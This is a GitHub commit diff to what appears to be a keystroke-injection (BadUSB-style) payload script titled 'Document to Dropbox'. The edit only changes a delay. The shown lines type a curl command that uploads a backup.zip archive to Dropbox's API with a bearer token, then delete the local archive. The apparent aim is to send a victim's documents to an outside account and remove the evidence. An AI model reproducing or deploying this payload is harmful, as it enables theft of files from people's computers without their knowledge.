Updated Delay after curl to allow for a better upload success on Document to Dropbox API .txt

This commit is contained in:
Narsty
2023-06-17 19:27:18 -05:00
committed by GitHub
parent f5ac292aea
commit 7761dccd85
+1 -1
View File
@@ -29,7 +29,7 @@ DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <API access token here>" -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip
DELAY 1000
ENTER
DELAY 500
DELAY 10000
STRING rm /tmp/Backup/backup.zip
ENTER
DELAY 500